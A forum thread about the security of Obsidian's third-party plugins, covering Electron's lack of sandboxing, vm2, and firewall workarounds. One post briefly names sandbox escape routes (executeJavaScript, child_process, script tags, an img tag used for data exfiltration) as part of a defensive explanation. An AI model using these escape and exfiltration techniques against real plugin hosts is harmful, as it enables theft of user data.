Security of the plugins

i don’t know anything about coding, but that sounds understandable

may i ask what are the costs of integrating some 3rd-party plug-ins into the existing native plug-in collection? i assume the native ones are security guaranteed

many thanks

oh that’s nice

There’s something that the earlier discussions were missing, and the devs tried to explain but it didn’t seem to come across very clearly to some folks.

So I’ll try to break it down a bit and hopefully it will help others understand the issues here.

For reference, I work in cybersecurity, and although I don’t know the specifics of the inner workings of Electron and Node I do know enough to understand the nature of how these types of apps work and the ramifications of those architectures.

  • Obsidian runs on Electron, which is an implementation of Node.js and Chromium on the desktop
  • Normally javascript runs inside a browser which has a strict security model, often called a “sandbox” that prevents the JS from touching anything the browser does not expose
    • browser-executing javascript cannot even see the file system so it cannot execute arbitrary commands against your files – this is by design inherent in the browser security model
    • this seems to be the viewpoint adopted by some which appears to reflect a misunderstanding of the nature of Electron vs normal browser-based apps
  • When “normal” apps run they are run with the security permissions of the user who runs them
    • behind the scenes each process must run under a user ID, and for apps you open/execute they automatically run under your user ID – with your security permissions attached
    • this is why running an app can mean the app has access to any file/folder that you have access to, because the app is effectively running “as you” while it executes
    • mobile apps (in particular iOS) have altered how people understand security at the app & OS level, because iOS is specifically designed to create this “sandbox” effect by restricting what data an app can see centrally
    • non-mobile OSes (e.g. Windows, Mac, Linux) are not designed that way and instead run each process in the process space and memory space of the user who runs them with that user’s security permissions
  • Node.js is a javascript engine designed for direct execution at the OS level on Windows, Mac, and Linux OSes, and as such it does not run inside a browser or any other app “sandbox”
    • it runs in the process space and memory space of the user who runs it and thus has access to everything that user has access to
    • this means any Node.js app has full access to all of your files and data, anything you can open in your file browser or editor of choice and read/edit/delete, so can any Node.js app you open, because behind the scenes it is running “as you” with your permissions
  • Since Electron runs on Node.js it also runs as that user in the process/memory space of the user who runs it, and thus has full access to everything that user has access to
    • “Plugins” in an Electron ecosystem are simply javascript files that are loaded into the running Electron process, which again already has full access to everything the user running it has access to (and again, this was by design when OSes were designed decades ago)
  • Since Obsidian runs on Electron then Obsidian plugins are also just javascript loaded into the same process space and memory space as the main Electron components, which again behind the scenes are running on Node.js which is itself running within the process/memory space of the user who runs it

Therefore, it isn’t feasible to restrict the plugins in the manner requested since any arbitrary javascript code by design can be injected into a running Electron process.

This is articulated by the Electron developers themselves. From a link originally posted by @rapatel0:

As web developers, we usually enjoy the strong security net of the browser - the risks associated with the code we write are relatively small. Our websites are granted limited powers in a sandbox, and we trust that our users enjoy a browser built by a large team of engineers that is able to quickly respond to newly discovered security threats.

When working with Electron, it is important to understand that Electron is not a web browser. It allows you to build feature-rich desktop applications with familiar web technologies, but your code wields much greater power. JavaScript can access the filesystem, user shell, and more. This allows you to build high quality native applications, but the inherent security risks scale with the additional powers granted to your code.

With that in mind, be aware that displaying arbitrary content from untrusted sources poses a severe security risk that Electron is not intended to handle. In fact, the most popular Electron apps (Atom, Slack, Visual Studio Code, etc) display primarily local content (or trusted, secure remote content without Node integration) – if your application executes code from an online source, it is your responsibility to ensure that the code is not malicious.

Source: Security, Native Capabilities, and Your Responsibility | Electron

Additionally, creating a “privacy rating” risks two things:

  • security theater, where people trust what they perceive to be a quantified rating that is in fact based on a subjective qualitative analysis (this is a massive problem across all of security, btw)
  • legal/financial liability for the devs, where a plugin is proven to not have sufficient protections to warrant the rating it was given

Finally, to one of @den’s points:

anyway the API should have security in mind…for example read only access

As above, since javascript plugins are loaded into the running user context of the underlying Node.js process they can trivially bypass any restrictions the Obsidian devs tried to place into the API.

If the devs add security restrictions to the API the javascript can simply bypass that by executing a shell command to run against the underlying folders and markdown files in the vault. Remember, the plugin runs under the Node.js process which runs “as you” and has all the same permissions you do to read/write all the files in your vault (and anywhere else on your computer that you have access to as well).

There’s nothing Obsidian can do to prevent that, since that capability exists by design as an inherent feature of Node.js itself.

Given all of the above the only immediately feasible mechanism for handling this situation appears to be the social rating trust mechanism already built into the plugin system, where users can easily access the GitHub projects for each plugin and see its source code and can rate the plugin up/down, and if necessary can contact the devs directly here to report an egregious security flaw to have it placed on the central denylist.


New user to Obsidian here.

I believe the solution to the proper sandboxing of the plugins is vm2 (see vm2 - npm ). This allows for sandboxed code to run within a node.js context with no known escape routes except those poked into it via an API.

It may well be that the intended API and control system have a huge venerable surface area due to needed features. I haven’t done the deep dive there.

But there does exist good sandboxing tools on node.js…


I work in systems that deals with PHI.

FileVault is security for “data at rest”. Which is to say, when your computer is off. If someone were to physically walk away with it, try to extract data from the hard drive, this would be a barrier to that.

Data at rest is the #1 method of data compromise, by far.

Your notes will be venerable to malware, but it is generally not going to want to sniff through your personal notes for PHI. It’s after more directly valuable commodities. Financial credentials, AWS keys, and the like.

Sandboxing code is certainly doable technically, but it would either cripple the entire plugin API, or it would be trivial to bypass the sandbox. Proper sandboxing basically means removing almost everything from the API (access to the DOM elements, most node.js and electron APIs), which means pretty much 90%+ of current plugins would just plain be impossible.

If plugins had access to Electron’s API, then it would be trivial to escape sandbox by creating a new BrowserWindow and then win.webContents.executeJavaScript('untrusted code');.

If plugins had access to Node.JS’s API, then it can sandbox escape using a variety of mechanisms like child_process.

If we were to allow DOM access, then it would be trivial to escape the sandbox too. There are many ways why DOM access can sandbox escape - a simple version would be creating a <script> tag, and a possibly more sophisticated attack would involve using iframes or non-html namespaces (like using svg). Regardless, even with a simple <img src=""> you now have a data-exfil mechanism.


It’s funny, this conversation gives me flashbacks to 2014 when I really started using the atom editor. I had this same concern and there was a long thread about this exact topic:

It’s telling that the original team behind making electron and atom don’t have a good story around this problem. Every electron app that you use that has user created plugins will have the same gaping vulnerabilities.

Is it possible to security lock down plugins? Well… maybe. Figma did some interesting things to lock down their plugin system (but it’s a bit different b/c those also have to run in their web app). They have a large engineering team with a lot of resources and a different set of constraints though. Also, as @Licat said, the ecosystem that exists now couldn’t continue to exist.

At the end of the day, just be very judicious with what you install. Downloading a plugin is no different and no safer than installing a package from NPM. Both are running arbitrary unseen code from a stranger on the internet.


@zephraph…Can you explain briefly (if that’s possible) whether or not what you’ve written about plugin ‘security issues’ applies equally to someone only using plugins with the Obsidian iPadOS app with Obsidian Sync and NOT Obsidian on a Mac. By that I mean, it is my limited understanding that the iPad App is Sandboxed within the iPadOS ecosystem so that plugins I use with Obsidian Mobile can NOT gain access to anything outside the app unlike on MacOS where the Obsidian app version uses Electron, etc., etc!

1 Like

I’m not an expert on iOS security, but as I understand it having 3rd party plugin code running within obsidian wouldn’t impact the security of a device any more than installing a random app from the app store. There are technically caveats to that statement. One might suggest that the app store review process is in part designed to catch malicious activity, but given that there are high profile scam apps that are left up I highly doubt the process is thorough enough to vet all that deeply.

It’s certainly different that the app running on a desktop though. iOS has built in security sandboxing on a per app basis. Apps can’t arbitrarily access information on the device without explicit granted permissions. If, however, you grant obsidian access to say… view and edit your photos, then it’s technically possible that a plugin running inside of obsidian could also access your photos. So long as the obsidian app limits its overall permission requests then it should be relatively safe.

The risk is smaller, but it’s not without risk.

Thanks. In this instance IMHO, Smaller IS better!

I’m not an expert, but it seems to me that we could approach this question from a different angle:

What would be some ways to run Obsidian with third-party plugins in a relatively secure manner (when using sensitive data, for example)? The most obvious approach for the desktop, it seems to me, would be to use a firewall to disable Obsidian’s internet access whenever one is using third-party plugins. (For a firewall on Windows, I use Netlimiter.) If one is using Obsidian Sync, one could periodically turn ‘safe mode’ back on and enable Obsidian’s internet access to allow syncing. To install or update plugins, one would need to turn off each third-part plugin and then enable Obsidian’s internet access.

This approach wouldn’t stop malicious code that somehow installs itself outside of Obsidian (if such a thing is possible), but it should prevent third-party plugins from directly accessing the internet.

(On mobile, one could turn off WiFi and Bluetooth, and disable Obsidian’s permission to use cellular data, while one has third-party plugins enabled.)

Does the above make sense? It’s a bit cumbersome, but it seems to me that it could be worthwhile in some cases.


@lucasd : good suggestion. On my Mac laptop I use Lulu (it is free) which alerts me whenever an app tries to go online without my authorization.


Basically on desktop you can use per-app or IP tables firewalls, and on mobile you can use mobile firewalls or just switch off Internet access to Obsidian.

Some suggestions:

  • Windows: TinyFirewall
  • Mac: Lulu
  • Linux: OpenSnitch (+ GUI)
  • Android: NetGuard (supports IP tables as well)
  • iOS: [no idea]

I’ve been a mac user for 25 years. During this time the OS system grew from a few MB to GB. Meantime having huge problems keeping my system clean. Even as a heavy user, i still have very little to no knowledge of developing and programming. I completely reinstall my system every one to two years. To get rid of all the junk that accumulates in the system, especially in the library folder.

I installed Lulu once. Without even having the faintest idea what most of the processes and internet connections are necessary for that were shown to me in this program - so i uninstalled it.

What I want to say, users and programmers view this subject from two absolutely different worlds. I am absolutely unable to verify the security of Obsidian plugins. If obsidian developers want to make sure users will install plugins, there must be another way (from my point of view).


@PietArt: I doubt the Obsidian devs want people to install plug-ins, why should they? Their focus is purely Obsidian, and in order to stay focused like that they (husband + wife) have stated clearly they do not have the time to check and keep tabs on plug-ins.

If you look at the plug-in list there are huge numbers of downloads so they are already popular with many.

At the end of the day you will have to take a gamble: do I trust this plug-in dev or not.

Maybe, for one, so they don’t have to deal with every feature request that is submitted in this forum. Kind’da allows for a narrowing of focus, so to speak.

Besides, in an earlier post in this thread @Licat said-
“ Sandboxing code is certainly doable technically, but it would either cripple the entire plugin API, or it would be trivial to bypass the sandbox. Proper sandboxing basically means removing almost everything from the API (access to the DOM elements, most node.js and electron APIs), which means pretty much 90%+ of current plugins would just plain be impossible.

They don’t have to deal with every FR, the mods do that.

So…….the Mods determine what’s ‘worthy’?

No, I’m not sure what Klaas is referring to. You are certainly right that the plugin API has allowed the community to build out tons of features that would have been impossible for the developers to handle by themselves.

@Daveb08: if I am not mistaken the FRs go through an initial filtering by the mods, notably WhiteNoise. FRs maybe unachievable/unrealistic, or perhaps have already been submitted, or being worked on, ……

That in and of itself relieves the devs of a lot of work, although they ultimately decide what is “worthy”, as you call it.